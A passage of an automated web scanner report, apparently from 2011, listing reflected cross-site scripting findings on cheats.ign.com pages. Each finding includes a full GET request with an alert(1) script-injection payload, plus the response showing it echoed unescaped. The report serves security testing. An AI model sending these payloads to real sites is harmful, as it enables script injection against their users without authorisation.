Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:15 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/001/001317.html?645d7"><script>alert(1)</script>76338fa888c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.96. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/038/038020.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff85"><script>alert(1)</script>58343bed42e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/038/038020.html?6ff85"><script>alert(1)</script>58343bed42e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:59 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 104502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/038/038020.html?6ff85"><script>alert(1)</script>58343bed42e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.97. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/038/038020.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77763"-alert(1)-"34b88f4b639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/038/038020.html?77763"-alert(1)-"34b88f4b639=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:02 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 104439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/038/038020.html?77763"-alert(1)-"34b88f4b639=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.98. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077644.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5b6f"-alert(1)-"4d1ec130b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/077/077644.html?c5b6f"-alert(1)-"4d1ec130b8e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:09 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 106691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/077/077644.html?c5b6f"-alert(1)-"4d1ec130b8e=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.99. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077644.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79428"><script>alert(1)</script>f8b26e0b0f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/077/077644.html?79428"><script>alert(1)</script>f8b26e0b0f3=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:07 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 106860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/077/077644.html?79428"><script>alert(1)</script>f8b26e0b0f3=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.100. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077723.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c538f"-alert(1)-"ca764e476e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/077/077723.html?c538f"-alert(1)-"ca764e476e0=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:02 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 109334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/077/077723.html?c538f"-alert(1)-"ca764e476e0=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.101. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077723.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff970"><script>alert(1)</script>75476dfe71e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/077/077723.html?ff970"><script>alert(1)</script>75476dfe71e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:59 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 104169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/077/077723.html?ff970"><script>alert(1)</script>75476dfe71e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.102. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/142/14235018.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 801b0"-alert(1)-"e0bf0ad5652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/142/14235018.html?801b0"-alert(1)-"e0bf0ad5652=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:08 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 120521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
scoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/142/14235018.html?801b0"-alert(1)-"e0bf0ad5652=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.103. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/142/14235018.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25be8"><script>alert(1)</script>f1c064d66f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/142/14235018.html?25be8"><script>alert(1)</script>f1c064d66f3=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
